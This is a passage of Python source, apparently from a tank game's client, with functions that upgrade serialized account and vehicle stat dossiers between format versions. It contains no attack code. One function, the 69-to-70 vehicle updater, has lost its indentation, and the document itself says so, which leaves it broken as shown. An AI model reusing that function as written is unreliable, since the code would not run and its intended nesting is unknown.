                # the new markOfMasteryCut block.
                markOfMasteryCutBlockFormat += 'IB'
                markOfMasteryCutBlockValues += [items[0], items[3]]
            idx += itemLength
        # New item layout: one uint32 key followed by three uint32 values.
        newKeyFormat, newValueFormat = ('I', 'III')
        newItemFormat = newKeyFormat + newValueFormat
        fmt = '<' + newItemFormat * length
        newA15x15CutCompDescr = struct.pack(fmt, *newValues)
        setBlockCompDescr(updateCtx, 'a15x15Cut', newA15x15CutCompDescr)
    addBlock(updateCtx, 'markOfMasteryCut', markOfMasteryCutBlockFormat, markOfMasteryCutBlockValues)
    setVersion(updateCtx, 108)
    return (
     108, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier108(compDescr):
    """Upgrade an account dossier from version 108 to 109.

    Converts the fixed-size 'rankedBadges' block (per-badge timestamps
    stored as day counts) into a new variable-size 'playerBadges' block of
    (badgeID, unix-timestamp) uint32 pairs, then removes 'rankedBadges'.
    Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v108 account dossier; positions must match
    # the serialized header exactly.
    blocksLayout = [
        'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
        'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
        'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
        'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
        'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
        'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
        'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
        'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
        'falloutCut', 'maxFallout', 'falloutAchievements',
        'ranked', 'maxRanked', 'rankedCut', 'rankedBadges', 'rankedSeasons', 'rankedCurrent', 'rankedPrevious',
        'maxRankedCurrent', 'maxRankedPrevious', 'rankedCurrentCut', 'rankedPreviousCut', 'rankedCurrentCycle',
        'rankedPreviousCycle', 'a30x30', 'a30x30Cut', 'max30x30', 'markOfMasteryCut']
    updateCtx = {'dossierCompDescr': compDescr,
     'blockSizeFormat': 'H',
     'versionFormat': 'H',
     'blocksLayout': blocksLayout
    }
    getHeader(updateCtx)
    # Byte offset / format of each badge slot in the old fixed-size block;
    # keys are badge IDs as strings.
    rankedBadgesPacking = {'1': (0, 'H'),
     '2': (2, 'H'),
     '3': (4, 'H'),
     '4': (6, 'H'),
     '5': (8, 'H'),
     '6': (10, 'H'),
     '7': (12, 'H'),
     '8': (14, 'H'),
     '9': (16, 'H')
    }
    badges = getStaticSizeBlockRecordValues(updateCtx, 'rankedBadges', rankedBadgesPacking)
    addItems = {}
    _SECONDS_IN_DAY = 86400
    for strBadgeID, daysTimestamp in badges.iteritems():
        if daysTimestamp:
            # A zero day stamp means the badge was never earned; otherwise
            # convert the day count to a seconds-based unix timestamp.
            addItems[int(strBadgeID)] = daysTimestamp * _SECONDS_IN_DAY
    LOG_DEBUG_DEV('addItems', addItems)
    # Pack the earned badges as little-endian (badgeID, timestamp) uint32
    # pairs for the new variable-size playerBadges block.
    itemFormat = 'II'
    subBlockFormat = '<'
    subBlockValues = []
    for k, v in addItems.iteritems():
        subBlockFormat += itemFormat
        subBlockValues.append(k)
        subBlockValues.append(v)
    LOG_DEBUG_DEV('subBlockFormat', subBlockFormat, subBlockValues)
    addBlock(updateCtx, 'playerBadges', subBlockFormat, subBlockValues)
    removeBlock(updateCtx, 'rankedBadges')
    setVersion(updateCtx, 109)
    return (
     109, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier109(compDescr):
    """Upgrade an account dossier from version 109 to 110 by appending the
    epic-battle statistic blocks.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v109 account dossier.
    # FIX: this layout previously listed 'rankedCuts', which does not match
    # the 'rankedCut' block name used by every other version's layout
    # (including v108, whose output *is* the v109 descriptor); corrected
    # for consistency.
    blocksLayout = [
        'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'vehTypeFrags',
        'a15x15Cut', 'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7', 'achievements7x7', 'historical',
        'maxHistorical', 'historicalAchievements', 'historicalCut', 'uniqueAchievements', 'fortBattles',
        'maxFortBattles', 'fortBattlesCut', 'fortSorties', 'maxFortSorties', 'fortSortiesCut', 'fortBattlesInClan',
        'maxFortBattlesInClan', 'fortSortiesInClan', 'maxFortSortiesInClan',
        'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7',
        'achievementsRated7x7', 'rated7x7Cut', 'globalMapMiddle', 'globalMapChampion', 'globalMapAbsolute',
        'maxGlobalMapMiddle', 'maxGlobalMapChampion', 'maxGlobalMapAbsolute', 'globalMapCommonCut', 'fallout',
        'falloutCut', 'maxFallout', 'falloutAchievements', 'ranked', 'maxRanked', 'rankedCut',
        'rankedSeasons', 'rankedCurrent', 'rankedPrevious', 'maxRankedCurrent', 'maxRankedPrevious',
        'rankedCurrentCut', 'rankedPreviousCut', 'rankedCurrentCycle', 'rankedPreviousCycle',
        'a30x30', 'a30x30Cut', 'max30x30', 'markOfMasteryCut', 'playerBadges']
    updateCtx = {'dossierCompDescr': compDescr,
                 'blockSizeFormat': 'H',
                 'versionFormat': 'H',
                 'blocksLayout': blocksLayout}
    getHeader(updateCtx)
    addBlock(updateCtx, 'epicBattle')
    addBlock(updateCtx, 'epicBattleCut')
    addBlock(updateCtx, 'maxEpicBattle')
    addBlock(updateCtx, 'epicBattleAchievements')
    setVersion(updateCtx, 110)
    return (
     110, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier64(compDescr):
    """Upgrade a vehicle dossier from version 64 to 65.

    Moves the lifetime/mileage records out of 'a15x15'/'a15x15_2' into a
    new 'total' block, copies the max-result achievements into a new
    'max15x15' block (adding empty 'max7x7'), and relocates the
    winAndSurvived/frags8p counters from 'achievements' into the per-mode
    blocks.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v64 vehicle dossier.
    blocksLayout = [
        'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
        'achievements', 'vehTypeFrags']
    # Byte offsets of the records to be moved out of each source block.
    a15x15packing = {'creationTime': (0, 'I'),'battleLifeTime': (8, 'I'),'lastBattleTime': (4, 'I')}
    a15x15_2packing = {'mileage': (38, 'I'),'treesCut': (36, 'H')}
    achievementsPacking = {'maxFrags': (0, 'B'),'maxXP': (1, 'H'),'winAndSurvived': (3, 'I'),'frags8p': (7, 'I')
    }
    # Record order of the new 'total' and 'max15x15' blocks.
    totalLayout = [
        ('creationTime', 'I'), ('lastBattleTime', 'I'), ('battleLifeTime', 'I'),
        ('treesCut', 'H'), ('mileage', 'I')]
    max15x15Layout = [
        ('maxXP', 'H'), ('maxFrags', 'B'), ('maxDamage', 'H')]
    updateCtx = {'dossierCompDescr': compDescr,
     'blockSizeFormat': 'H',
     'versionFormat': 'H',
     'blocksLayout': blocksLayout
    }
    getHeader(updateCtx)
    # Seed the new 'total' block with the values read from a15x15/a15x15_2;
    # an empty dict (source blocks absent) yields an empty total block.
    totalDefaults = getStaticSizeBlockRecordValues(updateCtx, 'a15x15', a15x15packing)
    totalDefaults.update(getStaticSizeBlockRecordValues(updateCtx, 'a15x15_2', a15x15_2packing))
    if bool(totalDefaults):
        blockFormat, blockValues = getNewStaticSizeBlockValues(totalLayout, totalDefaults)
    else:
        blockFormat, blockValues = ('', None)
    addBlock(updateCtx, 'total', blockFormat, blockValues)
    removeRecords(updateCtx, 'a15x15', a15x15packing)
    removeRecords(updateCtx, 'a15x15_2', a15x15_2packing)
    # Move winAndSurvived/frags8p from 'achievements' into a15x15 (with the
    # old values as defaults) and into a7x7 (zero-initialized).
    achievementsValues = getStaticSizeBlockRecordValues(updateCtx, 'achievements', achievementsPacking)
    addRecords(updateCtx, 'a15x15', [
        ('winAndSurvived', 'I'), ('frags8p', 'I')], achievementsValues)
    addRecords(updateCtx, 'a7x7', [
        ('winAndSurvived', 'I'), ('frags8p', 'I')], {})
    if bool(achievementsValues):
        blockFormat, blockValues = getNewStaticSizeBlockValues(max15x15Layout, achievementsValues)
    else:
        blockFormat, blockValues = ('', None)
    addBlock(updateCtx, 'max15x15', blockFormat, blockValues)
    addBlock(updateCtx, 'max7x7')
    removeRecords(updateCtx, 'achievements', achievementsPacking)
    setVersion(updateCtx, 65)
    return (
     65, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier65(compDescr):
    """Upgrade a vehicle dossier from version 65 to 66 by appending the
    customization/compensation blocks.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v65 vehicle dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addBlock(ctx, 'inscriptions')
    addBlock(ctx, 'emblems')
    addBlock(ctx, 'camouflages')
    addBlock(ctx, 'compensation')
    setVersion(ctx, 66)
    return 66, ctx['dossierCompDescr']
def __updateFromVehicleDossier66(compDescr):
    """Upgrade a vehicle dossier from version 66 to 67 by adding the
    'sniper2' and 'mainGun' achievement records.
    Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v66 vehicle dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation']
    ctx = dict(dossierCompDescr=compDescr, blockSizeFormat='H',
               versionFormat='H', blocksLayout=layout)
    getHeader(ctx)
    addRecords(ctx, 'achievements', [('sniper2', 'H'), ('mainGun', 'H')], {})
    setVersion(ctx, 67)
    return 67, ctx['dossierCompDescr']
def __updateFromVehicleDossier67(compDescr):
    """Dossier update 67 -> 68: append an 'achievements7x7' block holding
    eight zeroed unsigned-short values.

    Returns (68, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    # Little-endian format of 8 'H' fields ('<HHHHHHHH'), all zero-filled.
    addBlock(ctx, 'achievements7x7', '<' + 'H' * 8, [0] * 8)
    setVersion(ctx, 68)
    return (68, ctx['dossierCompDescr'])
def __updateFromVehicleDossier68(compDescr):
    """Dossier update 68 -> 69: add 'tacticalBreakthrough' (byte, default 0)
    to the achievements7x7 block.

    Returns (69, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addRecords(ctx, 'achievements7x7', [('tacticalBreakthrough', 'B')],
               {'tacticalBreakthrough': 0})
    setVersion(ctx, 69)
    return (69, ctx['dossierCompDescr'])
def __updateFromVehicleDossier69(compDescr):
# Dossier update 69 -> 70: repairs dossiers whose header size entries do
# not match the actual payload length. NOTE: indentation was lost in this
# copy; the nesting of the repair steps below must be restored from the
# original source before this runs.
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions',
'emblems', 'camouflages', 'compensation', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
# header[0] is skipped, so headerValues[i] corresponds to header[i + 1].
headerValues = updateCtx['header'][1:]
sumAllValues = sum(headerValues)
# Actual payload length: the descriptor minus its header bytes.
vehDossierCompDescrLen = len(compDescr) - updateCtx['headerLength']
# Size entries by position in blocksLayout: 6 = 'a7x7', 11 = 'max7x7',
# 16 = 'achievements7x7'.
a7x7Size = headerValues[6]
max7x7Size = headerValues[11]
achievements7x7Size = headerValues[16]
# If the payload is exactly a7x7 + max7x7 bytes shorter than the header
# claims, zero those size entries (indices are +1 relative to
# headerValues because header[0] was skipped) and rebuild the descriptor.
if vehDossierCompDescrLen != sumAllValues and vehDossierCompDescrLen == sumAllValues - a7x7Size - max7x7Size:
updateCtx['header'][7] = 0
updateCtx['header'][12] = 0
updateCtx['header'][17] = 0
# Re-pack the corrected header in front of the untouched payload.
compDescr = struct.pack(updateCtx['headerFormat'], *updateCtx['header']) + compDescr[updateCtx['headerLength']:]
# header[17] (achievements7x7) was zeroed too, so trim that block's
# bytes from the tail to keep payload and header consistent.
if achievements7x7Size != 0:
compDescr = compDescr[:-achievements7x7Size]
# Re-parse the repaired descriptor before stamping the new version.
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
# NOTE(review): the three values below are recomputed but never read
# again - apparently dead code, kept as-is.
headerValues = updateCtx['header'][1:]
sumAllValues = sum(headerValues)
vehDossierCompDescrLen = len(compDescr) - updateCtx['headerLength']
setVersion(updateCtx, 70)
# NOTE(review): unlike the sibling updaters this returns the local
# compDescr, not updateCtx['dossierCompDescr']; assumes setVersion edits
# the same buffer in place - confirm against setVersion's definition.
return (
70, compDescr)
def __updateFromVehicleDossier70(compDescr):
    """Dossier update 70 -> 71: add 'potentialDamageReceived' and
    'damageBlockedByArmor' counters to the a15x15_2, company2, clan2 and
    a7x7 blocks.

    Returns (71, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    newRecords = [('potentialDamageReceived', 'I'),
                  ('damageBlockedByArmor', 'I')]
    # Same pair of records is appended to each of the four blocks.
    for block in ('a15x15_2', 'company2', 'clan2', 'a7x7'):
        addRecords(ctx, block, newRecords, {})
    setVersion(ctx, 71)
    return (71, ctx['dossierCompDescr'])
def __updateFromVehicleDossier71(compDescr):
    """Dossier update 71 -> 72: snapshot each block's current
    'battlesCount' into a new 'battlesCountBefore9_0' record for the
    a15x15, company, clan and a7x7 blocks.

    Returns (72, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    newRecords = [('battlesCountBefore9_0', 'I')]
    # In each block 'battlesCount' sits at offset 4 as an unsigned int;
    # its current value seeds the new record (0 if the block is absent).
    for block in ('a15x15', 'company', 'clan', 'a7x7'):
        packing = {'battlesCount': (4, 'I')}
        current = getStaticSizeBlockRecordValues(ctx, block, packing)
        addRecords(ctx, block, newRecords,
                   {'battlesCountBefore9_0': current.get('battlesCount', 0)})
    setVersion(ctx, 72)
    return (72, ctx['dossierCompDescr'])
def __updateFromVehicleDossier72(compDescr):
    """Dossier update 72 -> 73: no structural change, only a version bump.

    Returns (73, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    setVersion(ctx, 73)
    return (73, ctx['dossierCompDescr'])
def __updateFromVehicleDossier73(compDescr):
    """Dossier update 73 -> 74: register the 'historical' and
    'maxHistorical' blocks.

    Returns (74, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    for newBlock in ('historical', 'maxHistorical'):
        addBlock(ctx, newBlock)
    setVersion(ctx, 74)
    return (74, ctx['dossierCompDescr'])
def __updateFromVehicleDossier74(compDescr):
    """Dossier update 74 -> 75: add seven new 7x7 award records to
    'achievements7x7', all defaulting to 0.

    Returns (75, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    newRecords = [('godOfWar', 'H'),
                  ('fightingReconnaissance', 'H'),
                  ('fightingReconnaissanceMedal', 'H'),
                  ('willToWinSpirit', 'H'),
                  ('crucialShot', 'H'),
                  ('crucialShotMedal', 'H'),
                  ('forTacticalOperations', 'B')]
    # Every new record starts at zero.
    zeroDefaults = dict((name, 0) for name, _ in newRecords)
    addRecords(ctx, 'achievements7x7', newRecords, zeroDefaults)
    setVersion(ctx, 75)
    return (75, ctx['dossierCompDescr'])
def __updateFromVehicleDossier75(compDescr):
    """Dossier update 75 -> 76: add 'marksOnGun' (byte) and
    'movingAvgDamage' (unsigned short) to 'achievements'.

    Returns (76, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addRecords(ctx, 'achievements',
               [('marksOnGun', 'B'), ('movingAvgDamage', 'H')], {})
    setVersion(ctx, 76)
    return (76, ctx['dossierCompDescr'])
def __updateFromVehicleDossier76(compDescr):
    """Dossier update 76 -> 77: add five medal counters (unsigned short)
    to 'achievements'.

    Returns (77, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    medalNames = ('medalMonolith', 'medalAntiSpgFire', 'medalGore',
                  'medalCoolBlood', 'medalStark')
    addRecords(ctx, 'achievements', [(name, 'H') for name in medalNames], {})
    setVersion(ctx, 77)
    return (77, ctx['dossierCompDescr'])
def __updateFromVehicleDossier77(compDescr):
    """Dossier update 77 -> 78: register the 'uniqueAchievements' block.

    Returns (78, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addBlock(ctx, 'uniqueAchievements')
    setVersion(ctx, 78)
    return (78, ctx['dossierCompDescr'])
def __updateFromVehicleDossier78(compDescr):
    """Dossier update 78 -> 79: register the fortification blocks
    ('fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties',
    'fortAchievements').

    Returns (79, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    for newBlock in ('fortBattles', 'maxFortBattles', 'fortSorties',
                     'maxFortSorties', 'fortAchievements'):
        addBlock(ctx, newBlock)
    setVersion(ctx, 79)
    return (79, ctx['dossierCompDescr'])
def __updateFromVehicleDossier79(compDescr):
    """Dossier update 79 -> 80: add eleven new 7x7 award records to
    'achievements7x7', all defaulting to 0.

    Returns (80, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    newRecords = [('promisingFighter', 'H'),
                  ('promisingFighterMedal', 'H'),
                  ('heavyFire', 'H'),
                  ('heavyFireMedal', 'H'),
                  ('ranger', 'H'),
                  ('rangerMedal', 'H'),
                  ('fireAndSteel', 'H'),
                  ('fireAndSteelMedal', 'H'),
                  ('pyromaniac', 'H'),
                  ('pyromaniacMedal', 'H'),
                  ('noMansLand', 'H')]
    # All records start at zero.
    zeroDefaults = dict((name, 0) for name, _ in newRecords)
    addRecords(ctx, 'achievements7x7', newRecords, zeroDefaults)
    setVersion(ctx, 80)
    return (80, ctx['dossierCompDescr'])
def __updateFromVehicleDossier80(compDescr):
    """Dossier update 80 -> 81: add the 'damageRating' record (unsigned
    short) to 'achievements'.

    Returns (81, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addRecords(ctx, 'achievements', [('damageRating', 'H')], {})
    setVersion(ctx, 81)
    return (81, ctx['dossierCompDescr'])
def __updateFromVehicleDossier81(compDescr):
    """Dossier update 81 -> 82: add more 7x7 award records; 'awardCount'
    is seeded from _count7x7awards(), everything else starts at zero.

    Returns (82, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    # Count existing 7x7 awards before the new records are appended.
    awardCount = _count7x7awards(ctx)
    newRecords = [('guerrilla', 'H'),
                  ('guerrillaMedal', 'H'),
                  ('infiltrator', 'H'),
                  ('infiltratorMedal', 'H'),
                  ('sentinel', 'H'),
                  ('sentinelMedal', 'H'),
                  ('prematureDetonation', 'H'),
                  ('prematureDetonationMedal', 'H'),
                  ('bruteForce', 'H'),
                  ('bruteForceMedal', 'H'),
                  ('awardCount', 'I'),
                  ('battleTested', 'B')]
    defaults = dict((name, 0) for name, _ in newRecords)
    defaults['awardCount'] = awardCount
    addRecords(ctx, 'achievements7x7', newRecords, defaults)
    setVersion(ctx, 82)
    return (82, ctx['dossierCompDescr'])
def __updateFromVehicleDossier82(compDescr):
    """Dossier update 82 -> 83: move one-shot achievements out of the
    'achievements'/'achievements7x7' blocks into a new binary-set block
    'singleAchievements'.

    Returns (83, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    singleLayout = ['titleSniper', 'invincible', 'diehard', 'handOfDeath',
                    'armorPiercer', 'tacticalBreakthrough']
    # Byte records to migrate, keyed by (offset, format) in their blocks.
    achPacking = {'titleSniper': (88, 'B'),
                  'invincible': (89, 'B'),
                  'diehard': (90, 'B'),
                  'handOfDeath': (93, 'B'),
                  'armorPiercer': (94, 'B')}
    ach7x7Packing = {'tacticalBreakthrough': (16, 'B')}
    collected = {}
    collected.update(getStaticSizeBlockRecordValues(ctx, 'achievements',
                                                    achPacking))
    collected.update(getStaticSizeBlockRecordValues(ctx, 'achievements7x7',
                                                    ach7x7Packing))
    blockFormat, blockValues = getNewBinarySetBlockValues(singleLayout,
                                                          collected)
    addBlock(ctx, 'singleAchievements', blockFormat, blockValues)
    # Drop the migrated records from their old homes.
    removeRecords(ctx, 'achievements', achPacking)
    removeRecords(ctx, 'achievements7x7', ach7x7Packing)
    setVersion(ctx, 83)
    return (83, ctx['dossierCompDescr'])
def __updateFromVehicleDossier83(compDescr):
    """Dossier update 83 -> 84: add a 'clanAchievements' block with a
    single 'medalRotmistrov' byte record set to 0.

    Returns (84, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    blockFormat, blockValues = getNewStaticSizeBlockValues(
        [('medalRotmistrov', 'B')], {'medalRotmistrov': 0})
    addBlock(ctx, 'clanAchievements', blockFormat, blockValues)
    setVersion(ctx, 84)
    return (84, ctx['dossierCompDescr'])
def __updateFromVehicleDossier84(compDescr):
    """Dossier update 84 -> 85: backfill 'battlesCountBefore9_0' from the
    older pre-8.8/pre-8.9 counters in the a15x15, clan and company blocks
    when the 9.0 counter is still zero.

    Returns (85, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
              'compensation', 'achievements7x7', 'historical',
              'maxHistorical', 'uniqueAchievements', 'fortBattles',
              'maxFortBattles', 'fortSorties', 'maxFortSorties',
              'fortAchievements', 'singleAchievements', 'clanAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    # (block, legacy record name, offset of battlesCountBefore9_0);
    # the legacy counter sits at offset 56 in all three blocks.
    migrations = (('a15x15', 'battlesCountBefore8_8', 68),
                  ('clan', 'battlesCountBefore8_9', 60),
                  ('company', 'battlesCountBefore8_9', 60))
    for block, oldKey, newOffset in migrations:
        packing = {'battlesCountBefore9_0': (newOffset, 'I'),
                   oldKey: (56, 'I')}
        values = getStaticSizeBlockRecordValues(ctx, block, packing)
        if values and values[oldKey] > 0 and values['battlesCountBefore9_0'] == 0:
            values['battlesCountBefore9_0'] = values[oldKey]
            setStaticSizeBlockRecordValues(ctx, block, packing, values)
    setVersion(ctx, 85)
    return (85, ctx['dossierCompDescr'])
def __updateFromVehicleDossier85(compDescr):
    """Dossier update 85 -> 86: add ten new achievement records to
    'achievements' (no preset values).

    Returns (86, updated compact descriptor)."""
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'total', 'max15x15',
              'max7x7', 'inscriptions', 'emblems', 'camouflages',
